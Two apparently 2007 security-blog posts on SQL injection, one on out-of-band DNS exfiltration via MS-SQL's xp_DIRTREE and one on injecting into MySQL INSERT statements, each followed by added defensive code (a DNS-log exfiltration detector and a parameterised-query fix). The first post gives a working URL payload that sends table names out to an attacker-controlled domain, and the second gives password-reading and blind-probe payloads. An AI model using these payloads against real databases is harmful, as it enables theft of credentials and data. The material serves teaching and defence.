SQL Injection And OOB

October 25, 2007 Research | Comments (0) sid @ 6:15 pm

I attended this talk at DEF CON 15. If you have identified a SQL injection and outbound connections to UDP port 53 are not blocked, then this is probably the best way to get data out of the database server. The most beautiful part of this attack is that you get the data out of the database server in the form of DNS requests, even without being 'sa' or 'dbo'. Things you will need:-

Access to tcpdump running on a public IP address.

Here is an example:-

http://victim/exp.asp?name=blah';BEGIN DECLARE @r varchar(8000) SET @r=':' SELECT @r=@r+'.'+name FROM sysobjects WHERE xtype='U' AND name>@r end;DECLARE @x as varchar(8000);SET @x='\\'+SUBSTRING(@r,1,200)+'.mywebsite\x';EXEC master..xp_DIRTREE @x--

This will give you the first 200 chars of the output of (SELECT name FROM sysobjects WHERE xtype='U').

By iterating over the SUBSTRING() offset you can then get all table names within 3-4 requests.
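The defensive side of this technique is that every leaked chunk has to cross the network as a DNS query name, and those names look nothing like the ones people or applications normally resolve. The following script is an added editor's example (it is not part of the original post and not from Pentestmonkey's or Ferruh's tooling): it parses constructed DNS query-log lines and flags parent zones that receive queries whose names look like concatenated database output (many labels, unusual total length, or characters such as the leading ':' that the payload above produces). The log layout, the regex, the thresholds and the zone 'mywebsite.example' (standing in for the post's 'mywebsite') are all assumptions.

```python
import re
from collections import defaultdict

# Constructed DNS query-log sample (not real traffic). The layout
# "date time client query: qname" and the zone mywebsite.example are assumptions.
SAMPLE_LOG = """\
2007-10-25 18:15:01 10.0.0.5 query: www.example.com
2007-10-25 18:15:02 10.0.0.5 query: mail.example.com
2007-10-25 18:15:03 10.0.0.9 query: :.users.secret.orders.sessions.audit_log.mywebsite.example
2007-10-25 18:15:04 10.0.0.9 query: :.invoices.customers.payments.api_keys.mywebsite.example
2007-10-25 18:15:05 10.0.0.9 query: :.tokens.admins.mywebsite.example
2007-10-25 18:15:06 10.0.0.7 query: cdn.example.com
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<client>\S+) query: (?P<qname>\S+)$")


def parse_log(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def parent_zone(qname, levels=2):
    """Registrable parent of a query name (last two labels; a public-suffix list would be better)."""
    return ".".join(qname.rstrip(".").split(".")[-levels:])


def is_suspicious(qname, min_labels=4, min_length=40):
    """Heuristics for names built from database output rather than typed by a human:
    many labels (one per leaked row), unusual total length (the payload above ships
    up to 200 chars per query), or characters that never appear in ordinary hostnames."""
    name = qname.rstrip(".")
    labels = name.split(".")
    odd_chars = any(not (c.isalnum() or c in "-._") for c in name)
    return len(labels) >= min_labels or len(name) >= min_length or odd_chars


def score_zones(records):
    """Aggregate per parent zone: query count, distinct clients, suspicious-name count."""
    zones = defaultdict(lambda: {"queries": 0, "clients": set(), "suspicious": 0})
    for r in records:
        info = zones[parent_zone(r["qname"])]
        info["queries"] += 1
        info["clients"].add(r["client"])
        if is_suspicious(r["qname"]):
            info["suspicious"] += 1
    return zones


def flag_exfil(records, threshold=2):
    """Zones that received at least `threshold` suspicious-looking queries."""
    zones = score_zones(records)
    return sorted(z for z, info in zones.items() if info["suspicious"] >= threshold)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for zone in flag_exfil(recs):
        info = score_zones(recs)[zone]
        print(f"{zone}: {info['suspicious']}/{info['queries']} suspicious queries "
              f"from {sorted(info['clients'])}")
```

On the sample, only mywebsite.example is flagged (all three of its queries trip the checks), and the 'clients' set points at the single host that issued them, which in this scenario is the database server itself. A database server that resolves names at all, let alone for a zone it has no business with, is the thing worth alerting on; blocking its outbound UDP/53 entirely removes the channel.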

How would you compare this with WAITFOR DELAY attack techniques?

Credits:- Pentestmonkey, Ferruh

Exploiting SQL Injections In Insert Statements

October 7, 2007 Research | Comments (0) sid @ 7:28 pm

Exploiting SQL injections in INSERT statements is not trivial, as most of the time you do not directly see the output of the injected query.

Unlike MS-SQL, MySQL 'generally' does not support stacked (multiple) queries, which is a common trick for exploiting SQL injections when the backend database is MS-SQL.

----------------------------------------

Example 1 

Let's consider a vulnerable example, the injection point being $id (an integer field) in the following statement:-

insert into secret values($id, 'Welcome');

----------------------------------------

Exploit 

insert into secret values(1000, (select passwd from users where id=1))#, 'Welcome');

'#' comments out the rest of the query.

----------------------------------------

Example 2: Blind Injection

Scenario:- the injection is in the last column of the query, which is an integer field, hence an attacker cannot directly select a password into an integer field.

Query:- insert into secret values('WELCOME', $id);

EXPLOIT:- 

insert into secret values('WELCOME', (select if (passwd ='mypass',1,0) from users where id=1))#);

----------------------------------------

If 'magic_quotes' is enabled, then one can use functions like ascii() and substr() to exploit it.
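Both examples above rest on the same defect: $id is spliced into the statement text, so a subquery written into it is evaluated. The following is an added example, not from the original post, using Python's sqlite3 as a stand-in for MySQL: it runs Example 1's pattern (the vulnerable form) beside the hardened form, which coerces $id to the integer the column holds and binds it as a parameter. The same fix closes Example 2, since the if() probe is also just a subquery where an integer belongs. The payload is Example 1's subquery without the trailing '#' (SQLite does not use '#' comments, and the statement parses without it); the table layout and the 'mypass' row are constructed.

```python
import sqlite3

# Constructed stand-in for the post's tables (SQLite in memory instead of MySQL).
SCHEMA = """
CREATE TABLE users (id INTEGER, passwd TEXT);
CREATE TABLE secret (id INTEGER, msg TEXT);
INSERT INTO users VALUES (1, 'mypass');
"""

# Example 1's injected subquery, minus the trailing '#': SQLite has no '#' comments,
# and without it the statement still parses because the subquery replaces $id exactly.
PAYLOAD = "(select passwd from users where id=1)"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def insert_vulnerable(conn, id_value):
    """The pattern from the post: $id is pasted into the statement text, so SQL inside it runs."""
    conn.execute("INSERT INTO secret VALUES(%s, 'Welcome')" % id_value)
    conn.commit()


def insert_hardened(conn, id_value):
    """Hardened form: coerce to the type the column holds, then bind as a parameter.
    int() rejects anything that is not a whole number, and binding keeps even a
    string value out of the statement text (there are no quotes in the payload,
    so quote escaping such as magic_quotes would not have helped here)."""
    id_int = int(id_value)
    conn.execute("INSERT INTO secret VALUES(?, 'Welcome')", (id_int,))
    conn.commit()


def stored_ids(conn):
    return [row[0] for row in conn.execute("SELECT id FROM secret ORDER BY rowid")]


def demo():
    """Run both forms against the same payload and report what each stored."""
    vuln = fresh_db()
    insert_vulnerable(vuln, PAYLOAD)
    leaked = stored_ids(vuln)          # ['mypass']: the subquery ran and copied the password

    hard = fresh_db()
    try:
        insert_hardened(hard, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True                # the payload never reaches the database
    insert_hardened(hard, "1000")      # a legitimate request still works
    return leaked, rejected, stored_ids(hard)


if __name__ == "__main__":
    leaked, rejected, safe = demo()
    print("vulnerable form stored:", leaked)
    print("hardened form rejected payload:", rejected, "and stored:", safe)
```

The vulnerable form ends up with the password sitting in secret.id, which is exactly the outcome Example 1 describes; the hardened form raises before any SQL runs and still accepts a normal "1000". The type coercion is what matters for integer fields: escaping only addresses quotes, and neither payload on this page contains one.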

Question:- Can you exploit the above (example 2) if $id happens to be a string field? Let us know how! :)